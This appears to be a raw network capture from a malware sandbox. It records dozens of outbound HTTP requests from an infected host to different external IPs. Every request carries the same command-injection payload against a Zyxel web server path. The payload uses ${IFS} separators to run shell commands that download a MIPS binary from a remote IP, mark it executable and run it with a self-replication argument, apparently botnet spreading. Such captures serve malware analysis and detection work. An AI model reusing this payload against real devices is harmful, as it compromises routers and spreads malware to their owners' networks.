                                    Jan 13, 2024 19:02:40.325292110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5999192.168.2.1336094218.89.107.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325367928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6000192.168.2.1352994122.46.88.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325428009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6001192.168.2.1335692139.29.201.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325459957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6002192.168.2.1348328169.128.97.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325529099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6003192.168.2.1343428173.20.104.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325597048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6004192.168.2.1350028200.33.236.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325628996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6005192.168.2.135311493.213.151.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325687885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6006192.168.2.1344018156.170.185.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325742960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6007192.168.2.1360174180.201.41.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325798035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6008192.168.2.1356730196.186.8.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325835943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6009192.168.2.133464240.229.122.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325896025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6010192.168.2.135986632.92.117.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325969934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6011192.168.2.135180062.13.182.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325999022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6012192.168.2.135020093.39.234.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326078892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6013192.168.2.1339982199.11.11.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326127052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6014192.168.2.1355874126.93.130.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326162100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6015192.168.2.135142439.182.77.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326222897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6016192.168.2.1341966223.174.157.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326292038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6017192.168.2.1337006131.25.11.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326344013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6018192.168.2.1342908191.24.239.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326380968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6019192.168.2.136098040.76.83.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326440096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6020192.168.2.135454643.214.83.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326533079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6021192.168.2.1343982165.239.254.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326590061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6022192.168.2.1341168213.31.213.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326622009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6023192.168.2.1358016126.127.40.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326723099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6024192.168.2.1359132146.168.199.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326750994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6025192.168.2.1344442223.87.180.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326783895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6026192.168.2.135977212.30.250.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326819897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6027192.168.2.1346882108.243.158.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326909065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6028192.168.2.1358528152.51.102.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326958895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6029192.168.2.134620678.203.152.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.326997995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6030192.168.2.1354372149.178.211.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327069044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6031192.168.2.1342836100.1.172.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327121973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6032192.168.2.134246043.168.117.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327187061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6033192.168.2.135239674.195.60.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327235937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6034192.168.2.134324685.101.34.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327290058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6035192.168.2.1358930114.31.19.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327332973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6036192.168.2.1346670202.102.144.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327389956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6037192.168.2.1332826146.175.118.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327460051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6038192.168.2.1350808143.135.211.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327508926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6039192.168.2.1352908128.26.53.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327605963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6040192.168.2.1342296218.171.119.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327652931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6041192.168.2.135479434.156.150.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327708960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6042192.168.2.1355592162.163.169.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327785969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6043192.168.2.133504276.93.65.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327853918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6044192.168.2.135417671.228.246.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327935934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6045192.168.2.1343562147.66.246.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.327965975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6046192.168.2.133323239.183.190.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328027010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6047192.168.2.134544224.98.238.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328069925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6048192.168.2.133499083.81.205.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328151941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6049192.168.2.1354490155.213.69.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328227997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6050192.168.2.134359818.243.89.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328263044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6051192.168.2.13401788.103.237.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328299999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6052192.168.2.1333038102.59.153.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328383923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6053192.168.2.134253893.237.105.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328459024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6054192.168.2.133638084.30.45.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328499079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6055192.168.2.1359572134.15.37.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328562021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6056192.168.2.1336514140.235.198.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328619003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6057192.168.2.133403824.163.104.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328669071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6058192.168.2.134890834.251.107.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328691959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6059192.168.2.134283839.164.121.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328756094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6060192.168.2.134073667.191.145.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328821898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6061192.168.2.135237897.171.14.4443
                                    TimestampBytes transferredDirectionData
